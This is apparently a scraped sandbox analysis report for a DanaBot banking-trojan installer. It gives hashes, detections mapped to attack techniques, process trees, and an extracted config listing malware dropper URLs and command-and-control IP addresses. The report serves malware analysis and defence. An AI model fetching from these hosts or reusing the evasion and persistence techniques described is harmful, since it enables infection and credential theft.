danabot | a05acc9172e98ec6a6a7f923f5c648cc7a7c4e02bbcaaa5a6d9663229e662c24

Analysis

max time kernel
81s
max time network
375s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
15-06-2024 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

revosetup.exe
Size

6.6MB
MD5

63150c4846bfbcf27fa70ccaa8a01943
SHA1

bfe32dcc00b041e0007a883af1588f354bb9f032
SHA256

a05acc9172e98ec6a6a7f923f5c648cc7a7c4e02bbcaaa5a6d9663229e662c24
SHA512

7c0c8065c83529ffe9cf092a7ffb19f59252015d643bded9cf5459e6e6a4c582962ab6e36b330275a79649fa6e8d3da01cb95352870a52fa159bb278b967cd90
SSDEEP

98304:MPyYn2kIIR7ABl27MwarecfhZzwStzDtAVl3gaSZmg4MPyDv0bSpkmmf6osFQaiS:q7Vty27MJzw6z8X4mgJSyNyos6ac4l

Score

10^/10

danabot rms agilenet aspackv2 banker botnet discovery evasion execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\THE-MA~1\BANKIN~1\DanaBot.dll	family_danabot

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	108	2568	rundll32.exe	EXCEL.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	4564	powershell.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Modifies Windows Firewall 2 TTPs 11 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
4992	netsh.exe
4340	netsh.exe
3596	netsh.exe
1392	netsh.exe
2260	netsh.exe
3776	netsh.exe
4672	netsh.exe
4616	netsh.exe
2944	netsh.exe
1512	netsh.exe
1460	netsh.exe

Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2592 attrib.exe
1272 attrib.exe
1728 attrib.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
2592	attrib.exe
1272	attrib.exe
1728	attrib.exe

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
\ProgramData\Windows\rutserv.exe	aspack_v212_v242

Executes dropped EXE 1 IoCs

Processes:

revosetup.tmp

pid process

2408 revosetup.tmp
Loads dropped DLL 1 IoCs

Processes:

revosetup.exe

pid process

1080 revosetup.exe

pid	process
2408	revosetup.tmp

pid	process
1080	revosetup.exe

Modifies file permissions 1 TTPs 55 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4488	icacls.exe
3300	icacls.exe
2320	icacls.exe
2228	icacls.exe
1708	icacls.exe
832	icacls.exe
4048	icacls.exe
1300	icacls.exe
2280	icacls.exe
3288	icacls.exe
3700	icacls.exe
3676	icacls.exe
2264	icacls.exe
2628	icacls.exe
184	icacls.exe
2888	icacls.exe
4508	icacls.exe
3972	icacls.exe
332	icacls.exe
3276	icacls.exe
5004	icacls.exe
5056	icacls.exe
2100	icacls.exe
376	icacls.exe
3596	icacls.exe
4468	icacls.exe
1036	icacls.exe
3112	icacls.exe
4980	icacls.exe
2152	icacls.exe
2380	icacls.exe
3316	icacls.exe
2544	icacls.exe
2080	icacls.exe
3880	icacls.exe
2380	icacls.exe
3880	icacls.exe
1572	icacls.exe
3628	icacls.exe
3704	icacls.exe
3972	icacls.exe
4656	icacls.exe
2340	icacls.exe
2728	icacls.exe
4264	icacls.exe
5020	icacls.exe
4044	icacls.exe
1632	icacls.exe
1768	icacls.exe
4128	icacls.exe
2060	icacls.exe
600	icacls.exe
2576	icacls.exe
808	icacls.exe
4020	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/3808-3247-0x0000000000370000-0x0000000000384000-memory.dmp	agile_net

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
35	camo.githubusercontent.com
41	camo.githubusercontent.com
168	camo.githubusercontent.com
171	camo.githubusercontent.com
173	camo.githubusercontent.com
181	camo.githubusercontent.com

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

395 bot.whatismyipaddress.com

flow	ioc
395	bot.whatismyipaddress.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
\ProgramData\Windows\winit.exe	autoit_exe
C:\ProgramData\Microsoft\Intel\taskhost.exe	autoit_exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
184	sc.exe
4016	sc.exe
1708	sc.exe
3396	sc.exe
768	sc.exe
4952	sc.exe
156	sc.exe
2864	sc.exe
3116	sc.exe
3468	sc.exe
596	sc.exe
2080	sc.exe
1588	sc.exe
4348	sc.exe
3704	sc.exe
3508	sc.exe
640	sc.exe
1760	sc.exe
1476	sc.exe
1392	sc.exe
1492	sc.exe
3516	sc.exe
3328	sc.exe
4756	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3724 powershell.exe
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1904 4748 WerFault.exe Xanax.exe
1672 3808 WerFault.exe Lokibot.exe

pid	process
3724	powershell.exe

pid	pid_target	process	target process
1904	4748	WerFault.exe	Xanax.exe
1672	3808	WerFault.exe	Lokibot.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

796 schtasks.exe
1208 schtasks.exe
4040 schtasks.exe
3288 schtasks.exe
Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4016 timeout.exe
3444 timeout.exe
4380 timeout.exe
3376 timeout.exe
3108 timeout.exe
4564 timeout.exe
2940 timeout.exe

pid	process
796	schtasks.exe
1208	schtasks.exe
4040	schtasks.exe
3288	schtasks.exe

pid	process
4016	timeout.exe
3444	timeout.exe
4380	timeout.exe
3376	timeout.exe
3108	timeout.exe
4564	timeout.exe
2940	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4508 taskkill.exe
2184 taskkill.exe
4896 taskkill.exe
2492 taskkill.exe
1600 taskkill.exe
Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings firefox.exe
Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

3240 regedit.exe
3264 regedit.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

chrome.exe

pid process

2948 chrome.exe
2948 chrome.exe

pid	process
4508	taskkill.exe
2184	taskkill.exe
4896	taskkill.exe
2492	taskkill.exe
1600	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings	firefox.exe

pid	process
3240	regedit.exe
3264	regedit.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exefirefox.exe

description	pid	process
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeDebugPrivilege	2436	firefox.exe
Token: SeDebugPrivilege	2436	firefox.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe
Token: SeShutdownPrivilege	2948	chrome.exe

Suspicious use of FindShellTrayWindow 38 IoCs

Processes:

chrome.exefirefox.exe

pid	process
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe

Suspicious use of SendNotifyMessage 35 IoCs

Processes:

chrome.exefirefox.exe

pid	process
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2948	chrome.exe
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

firefox.exe

pid process

2436 firefox.exe
2436 firefox.exe
2436 firefox.exe
2436 firefox.exe
2436 firefox.exe
2436 firefox.exe

pid	process
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe
2436	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

revosetup.exechrome.exe

description	pid	process	target process
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 1080 wrote to memory of 2408	1080	revosetup.exe	revosetup.tmp
PID 2948 wrote to memory of 2272	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2272	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2272	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2708	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2596	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2596	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2596	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe
PID 2948 wrote to memory of 2552	2948	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4252 attrib.exe
1488 attrib.exe
3572 attrib.exe
1272 attrib.exe
1728 attrib.exe
2592 attrib.exe

pid	process
4252	attrib.exe
1488	attrib.exe
3572	attrib.exe
1272	attrib.exe
1728	attrib.exe
2592	attrib.exe

C:\Users\Admin\AppData\Local\Temp\revosetup.exe
"C:\Users\Admin\AppData\Local\Temp\revosetup.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Users\Admin\AppData\Local\Temp\is-PVK3E.tmp\revosetup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-PVK3E.tmp\revosetup.tmp" /SL5="$400E0,6355320,266240,C:\Users\Admin\AppData\Local\Temp\revosetup.exe"
  2⤵
  - Executes dropped EXE
  PID:2408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6c59758,0x7fef6c59768,0x7fef6c59778
  2⤵
  PID:2272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:2
  2⤵
  PID:2708
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:8
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1616 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:8
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2140 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2148 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1392 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:2
  2⤵
  PID:1928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1132 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:1
  2⤵
  PID:788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3428 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:8
  2⤵
  PID:576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3588 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:8
  2⤵
  PID:1016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3500 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:8
  2⤵
  PID:1948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3732 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:1
  2⤵
  PID:980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2404 --field-trial-handle=1332,i,9729821620553997551,6498063242558154506,131072 /prefetch:1
  2⤵
  PID:2420

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2376

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2072
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2436
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.0.1698821253\1686612364" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 20809 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {534e85b7-a292-451e-977f-d550cc24f5e9} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 1308 18cf6058 gpu
    3⤵
    PID:2028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2436.1.1818429387\1308610105" -parentBuildID 20221007134813 -prefsHandle 1472 -prefMapHandle 1468 -prefsLen 20890 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc680507-b5fc-4c39-b725-74c8c5e05f7c} 2436 "\\.\pipe\gecko-crash-server-pipe.2436" 1484 1673a858 socket
    3⤵
    PID:2332
- - C:\Program Files\Mozilla Firefox\firefox.exe
